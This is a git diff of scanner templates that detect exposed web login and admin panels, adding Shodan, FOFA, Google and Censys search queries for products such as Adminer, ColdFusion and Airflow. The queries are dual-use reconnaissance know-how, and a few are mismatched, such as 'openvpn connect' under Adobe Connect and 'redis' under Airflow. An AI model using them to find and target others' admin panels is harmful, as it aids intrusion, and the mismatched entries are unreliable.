a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -9,10 +9,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sierrawireless:airlink_mobility_manager:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ACEmanager" max-request: 1 - product: airlink_mobility_manager vendor: sierrawireless + product: airlink_mobility_manager + fofa-query: + - app="ACEmanager" + - app="acemanager" tags: panel,login,tech,acemanager,sierrawireless http: @@ -37,4 +39,4 @@ http: part: body regex: - 'ALEOS Version ([0-9.]+) \| Copyright &co' -# digest: 4a0a00473045022044705dff86109f891e630e39f981bfbca44cbef4cce7cdb9c760c2a860f07e59022100e2dedc81057f3fb8f2a4d7d3cf916ec5415ce7b69c058cb38f6989a4812307e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f2f4fe267d65eaf48fd3b478babdde167d3b6d124b63ee7b6b81d49491686d6022100b2398bc9306970b929162d3d6c19208a2ef2f024b366766343141daa252f29d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 1e1d7774d8..5d0eb5d734 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: body="Login @ Reporter" max-request: 1 shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" tags: panel,login,acenet,acereporter http: @@ -26,4 +26,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207267b35936d9aeb6cc4a04e7d12e755474f0ef18bc419f376706117f22a55b27022100f5916908fe214a72ab7ff4a5deb4d32503fa2f849f324b08e5b3911f0564ad1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220141c0f75e02469ee26415d050c17cf9c6fa067ed0c566774161ada40dde84880022025e247aac0c5489fb7c8069bc74978139ff650331c3b530977967fbe4b491a76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 4a56df4878..f51c441d8c 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -1,20 +1,20 @@ id: ackee-panel -info: - name: Ackee Panel - Detect - author: userdehghani - severity: info - description: | - self-hosted, node.js based analytics tool for those who care about privacy. - reference: - - https://ackee.electerious.com/ - - https://docs.ackee.electerious.com/ - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:-1495233116 - tags: panel,ackee,login,detect - +info: + name: Ackee Panel - Detect + author: userdehghani + severity: info + description: | + self-hosted, node.js based analytics tool for those who care about privacy. + reference: + - https://ackee.electerious.com/ + - https://docs.ackee.electerious.com/ + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:-1495233116 + tags: panel,ackee,login,detect + http: - method: GET path: @@ -28,4 +28,4 @@ http: - 'status_code==200 && contains(tolower(body), "ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" condition: or -# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f645629478b7a13ff535d409593f27801c6655a59cb6367f49e278c2e4c2375302210085a790abbb23134ab6c91ee665383cb897aecea77a535a7df18463dff7f86ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index aef9394078..f9d44560c5 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -10,10 +10,10 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: title=="Acrolinx Dashboard" - google-query: inurl:"Acrolinx Dashboard" max-request: 1 shodan-query: http.title:"Acrolinx Dashboard" + fofa-query: title=="Acrolinx Dashboard" + google-query: inurl:"Acrolinx Dashboard" tags: acrolinx,panel http: @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205965d1f8f3014c3afa77c395ccd721fb9d246c033490941dc9a4a2144ce9079d02204aa25b74e616928bf04e4e7001533d146ffe81a887963fd91dd6c902341394bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ab3ccc9d4ae0f949b14bc92cf47dd734298f7cbee9c1c035c181cac138a87a4022100c5fe5efa7bbba122af60b42ed58950445913d49d4088c1eea6c3b2f86e5365bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 0ed0743974..b98a8bd69b 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: app="ACTi-视频监控" + verified: true max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" - verified: true + fofa-query: app="ACTi-视频监控" tags: acti,panel,login,detect http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100886ee667fdd7be168381aefee8bb43b68e265fcaf00e08e264018d0480f4858302201ec09ff056d43319aabb9f66204cc95b11edac9ee877aaa5c4b25b0fe0db1c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index f8f370d602..875f1cd2d3 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:activeadmin:activeadmin:*:*:*:*:ruby:*:*:* metadata: max-request: 1 - product: activeadmin vendor: activeadmin + product: activeadmin tags: panel,activeadmin http: @@ -27,4 +27,4 @@ http: - "active_admin_content" - "active_admin-" condition: and -# digest: 4b0a004830460221008ff7c3e5ca9ea60724d5aa6d320d161dad483cbbe185ad21cda9f0bc96afe14002210096167ed3964f4ff49a5ac96d58bbfb00c29ee1301adad51286857d0cd9f279b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cba5c8e35d6d0ccdc32f0cc069ea5fabf9677df3afa1ae620f7bcc2ca57cda2a022100841902f40d7cd5d9853308a9d279c022a8df5e94892d9ff4cd31d652b717eb70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index 14fcf8c1d5..0ee31cbff8 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: activemq vendor: apache + product: activemq + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: panel,activemq,apache http: @@ -27,4 +30,4 @@ http: - '<h2>Welcome to the Apache ActiveMQ!</h2>' - '<title>Apache ActiveMQ' condition: and -# digest: 4a0a0047304502206c143bc3e4e0af4742044d95c50fe48e84f75d59138f4929bce3fc53f2f14090022100e52ac76beab4ea68c78856d78fc874725d38389f0d4cb5da0c6a0e12223eabe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200680997e4c289c87060383d51f4bb6961f032074940d7a88d3138c2409d5d33d022034ae36716fa244b3aeac8f14f6396f8559ca6197384d895d23af31b722998851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 1fde288b23..7d7dcd0165 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Acunetix" - verified: true tags: panel,acunetix http: @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d5cb967d632d9fe78d48b71dbf15a42b83f214f2f5418926c45d471bb980605022100a298f9a1bd77c2f13b4575c74a8309e0bbf2e6973187f6a2a34df0909be17576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3e0a36f23ada0e56b591d0157c75e124b21bda54ba9b3420bfb0a9bd53dc8430220756e3635374e9bcb62d53bd2c01ec6e7e51d7b68a5ae5dfde55c90058f3e66e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 204507ff2e..d3db3cffc8 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -6,9 +6,9 @@ info: severity: info description: AddOnFinance Portal Panel was detected. metadata: + verified: "true" max-request: 1 shodan-query: title:"AddOnFinancePortal" - verified: "true" tags: panel,addon,finance,detect http: @@ -26,4 +26,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee3ebff11567dbbf51ce9c7a22464e36fe9204b034b22fc7a14b81e0d7f584a70220789eec08d407b306b4fe49b64f565aeba67ffa9d3817091e91784a243f42f11a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ad483e2a89e05c46feba8e9689808f7cbf607abe51890010a2c55c795f17671022100d630feb47530f6e125f346d06ba30b99256b0c4fa238e84f0431c0b4da844ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index d49d385a39..d501e25dc4 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -6,11 +6,22 @@ info: severity: info description: WS_FTP Ad Hoc panel was detected. metadata: - max-request: 1 - product: ws_ftp - shodan-query: http.title:"Ad Hoc Transfer" - vendor: progress verified: true + max-request: 1 + vendor: progress + product: ws_ftp + shodan-query: + - http.title:"Ad Hoc Transfer" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" + censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" tags: panel,wsftp,ad-hoc,detect,login,progress http: @@ -31,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201bbd8e99562d715f0264d0492ba913fa6d3cf53694a8747a24043f25f74f3d0a02205a28ff4f92dbf4cd94ad0953664911a8eee6bb5e0ab93a5e020bd71b18421b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d193f82f9182396e714401804b3680b69b019186c884b3a4ec8e142256cf2af2022100c9d7b7bdc64aa0823b33726b281b2a6111d660cc839668083ba4693e0a5c47f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 784bfe9f8a..07edf97dfb 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: loganalyzer vendor: adiscon + product: loganalyzer tags: adiscon,loganalyzer,syslog,exposure,panel http: @@ -42,4 +42,4 @@ http: part: header words: - 'text/html' -# digest: 4b0a00483046022100c241b2782da3ebdfa49a2fb64590aea15664a4b46e973b63a485d1a15c6963b6022100be3e015ad635bbf8711a6db7b2040aff4e50bfc2e6ab80886ac177ca158f3a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220710f66d43a28354834212f505c80c3d4dd2b22c7479bea5a29495e76a291b99c022061b7d965f84c43f295aa47f631447bbb44162c7f496881cd72f2c6ad6023a564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8beeab25b4..c25eadd539 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -13,8 +13,16 @@ info: cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 741 - product: adminer vendor: adminer + product: adminer + shodan-query: + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,fuzz,adminer,login,sqli http: @@ -49,4 +57,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a00473045022100d9b52eb14eff5244681c7c9c5a0ba690f0ede3ae8be5a5a1cc836129feba30a502203b460896e6054121461e4687a0095f7067154c0c0aa8acfee98515857bdf1775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a33af2d5ccddd23e8cbb62e3bea51d3a3c9b33713ec8cfce4f124231105a89e6022100c0300b40409d563efda7769a7d1b82088ca29941066d704ae460b532c6f0172e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index e9543e8b03..5601a70c21 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -11,11 +11,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: - max-request: 8 - product: adminer - shodan-query: title:"Login - Adminer" - vendor: adminer verified: true + max-request: 8 + vendor: adminer + product: adminer + shodan-query: + - title:"Login - Adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - title="login - adminer" + - app="adminer" && body="4.7.8" + hunter-query: app.name="adminer"&&web.body="4.7.8" + google-query: intitle:"login - adminer" tags: panel,adminer http: @@ -52,4 +60,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a004730450221009f8f183a3f1aec4c1776bf24cac3abdc9c202b8cfb15c67232040d447a26d38002205f8ef54880eb471987d6c3757c50571a8a3d9df53d5a279b803e99ac75521ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ce0b5960f5fe32a8e390234c8a7c22b5a542baee68cda8e707f2206ecb06087022100fdd8f01155bc72d801c1699b299a664478f5bc3b4c62096d65c5f595a1f2d1e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index 48c5d1a42f..7ca59ecbe8 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -8,8 +8,8 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: app="AdminSet" max-request: 1 + fofa-query: app="AdminSet" reference: - https://github.com/guhongze/adminset/ tags: adminset,panel @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009675e2dfb0b94115aff6147949e37c234e508f1099adcd15050efe8a97421f4102204280dba047d6e4823c61339dd8a23534b8d7bd063b2d617c5c455d2aa8f18dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220786946d4e5a4779b6be435e975aa67091deb2a155a4354a615a5655ea2073f89022100be553711adc43157228142edcaf1356e10cb96d905f829f2427ed6d07b0e42d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index 1c53d8de87..1dd1f42444 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -12,9 +12,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" vendor: adobe + product: coldfusion + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,adobe,coldfusion,edb http: @@ -32,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220703b43ad652157d7cfa4c62f36643fd22f3e471b5e1ce46f446e74a5bb717fd4022100a1768401ea9cdff2b7b38a6f2e1b5ac302c4800311ce26ae47a35dab174fd117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fcaeb0e212b7c072e66534c6141c023bafd70bf896ed1538ff0158d38af3e102207f57cc30331e2add974f3e8e301e55ea2c1ee6c117a751419ca2385cdd7b6847:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index e8ce76b66a..8dd46ecc32 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -12,8 +12,11 @@ info: cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: connect vendor: adobe + product: connect + shodan-query: http.title:"openvpn connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: adobe,panel,connect-central http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fdc0717180f5c3a2962899d5f7e7dd6ab5af7f30f958f5a8ed4d821d284d492022100f42f33d6101fbbd3889b206a59c44d6a643ef27af203b1f34507d97a5b0a7f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c876f18c787ac5cb128ed24f93c259a65192e250e4beb87772a8782aabd6d321022100cdd90845a695d4b16f31befa68a814a8de062c71a295594d642b4467dd191838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml index 7cbef5bf80..6eac469f3d 100644 --- a/http/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/http/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -12,9 +12,15 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: experience_manager - shodan-query: http.title:"AEM Sign In" vendor: adobe + product: experience_manager + shodan-query: + - http.title:"AEM Sign In" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: @@ -31,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207f18e3670ddcebc689137819479658379c644f0ed75215d0e356338a5b4921c80221009cf8e3d0ba031262e5483191b0834d64b86dd60051bdd1ca0567bc297e891dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef71ed24e29f888e5a4ba8157b4103fcf3dfcc76e7c7636df1deca0942a7375e022100b7dd1594482e9202f67d9e0a026dec5abec308ebfacd8bc09b811a1f3630ba7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index 40889640a4..d75a1dea5c 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe http: @@ -39,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c0e2de79d2fdca7c3e2b3188880dea5c570ffe0792ada4615862565a7b3c64f02202d0234c0e32c7f6d32146dd9b8a3814b053575aa7ee1a48c0f0b361ac4aa57d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080df3aa73e1af3a3b21b4268af41242be9a0d0f447a84c67d51af9fa1206269f022006d1dd7b7f82f3192f87a14c047062ba6388b19874c42cd9175aac1a68984179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index d44f6ecd73..26facb94cc 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -13,11 +13,16 @@ info: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - vendor: adobe + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: panel,aem,adobe,sling http: @@ -42,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ebb04f07ba4604d3d6fe1b930ae1351e6ee34bb6b7f13ce850c1336f4cebc52022013841f057144f9de90e3361a59164c69e741d22c87cd860f7c4bb3d6b6c9b2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220018d2e371edac7d420df30d109b501f17b583c682e3af1228780152edf20904b0220669edda0b2f1b358140f2cbb6e9a1e4e8dabd4bce7cd2ee745d5139aebc8313a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 76e6a57eea..79ab4f6fe9 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirCube Dashboard" - verified: true tags: panel,aircube http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd6c23985fea3ea42e77ba203a8fce9e43333562673cb0c2706f59e22201f712022005c769ad7b436b5b9b0b4d507d901e3d8c2170ddad219dbafed8d890899a7dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5af67268d961cd4856f5808774eaeaa35c49d04408c0f33e325dd648cb4ca32022100b7f08a862ffbfd4d633dab083729b514115fbb0a95c4e5f19cb1ef2160abc4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index e0dee7f194..66c87ef5ea 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1249285083 - verified: true tags: panel,aircube,ubiquiti http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0cde8a94d9a87777fa4576699697df9a9bc6161482e374b8c93950042d73e6e02206095562164b4e93fd6ab403958fceedb86401484f02abf53c70b62888d428e78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057fb9a047f901b76ea05b3d4d9a7f0c03bf623505b92411811e8d4d43013b5be022100bef2d505c08ccb84b6d838ee36c64039e98ec6d9c239cc217391606d52ed87b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index c7beb91b2f..5520a77b80 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -13,9 +13,20 @@ info: cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: airflow - shodan-query: title:"Sign In - Airflow" vendor: apache + product: airflow + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" tags: panel,apache,airflow,admin http: @@ -37,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb0dd6f900e0a25540a87511757830536aff2963facff3165c0ffb3b04e26dcd022100b862fb6a05ed472db0f7a913c1f26bfa3a8325cda393d7e4a393d84f97d032c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc4ac3e99c4d82e8eabf5b70e0247c70d06b1ad17fb6012626e065c482b21d420220669fd742ca21a054b7979f267c42c40ec197f30e3e52c4c6bf7ebf5ac63ccc3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index 4120df8a00..732ba710b1 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"AirNotifier" - verified: true tags: panel,airnotifier http: @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207fb28075cac9c1b3e06234ce965a9e715df9fd9d77688d7be5e867d37c08fb93022062bfb7fd3f956b5ddb44e1a53fd4df73afac4846df3ffe9835895ec2a4fa40a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9df80c397b93cee6dbf34e98ec3e59549765504c37befd532db0058575bf96502207397e167834a50decdc389f3019bea5d5f5729624dce005b66637d168d8382fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index 1c18156638..1650540efd 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cloudtest vendor: akamai + product: cloudtest tags: panel,akamai http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204784d969cbbfb1472d923905a78cac56c1695004b9305686bd10da59cc48470902210096cb5382dc5689ee1188f42f1410a9806ea23d4e59b95f2aefaf9821d55cde70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206675dce6c5b24a3a4332f2542b981f6d750c5198bbb12f5b31afd29426adbc670221009e93de8b37f1b02634e062ee5db01a807f0e8a3a68ca08fc47f19cc7b3fb74c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 23c7abb560..365b3709f6 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:android:*:*:* metadata: max-request: 1 - product: alfresco vendor: alfresco + product: alfresco tags: alfresco,tech,panel http: @@ -41,4 +41,4 @@ http: - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' -# digest: 4b0a004830460221008d893c552b5e2bdde2631fec4d5ef9896421e1175b5b11b2eae4652101a550a0022100d2ae2342988557ee19fe02dfc809028429ddb4ff01d94fadf67709aa6cabcef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006c2000b6a0a543ec1a9658e068cfc76947be534354939a17e1deda23c33d25d022100e6f2d8ee69c3dfc86a6b0d5a640bd186d53d95a5a2764c6397f003e5292de853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/algonomia-panel.yaml b/http/exposed-panels/algonomia-panel.yaml index 5977b70308..3743cc8944 100644 --- 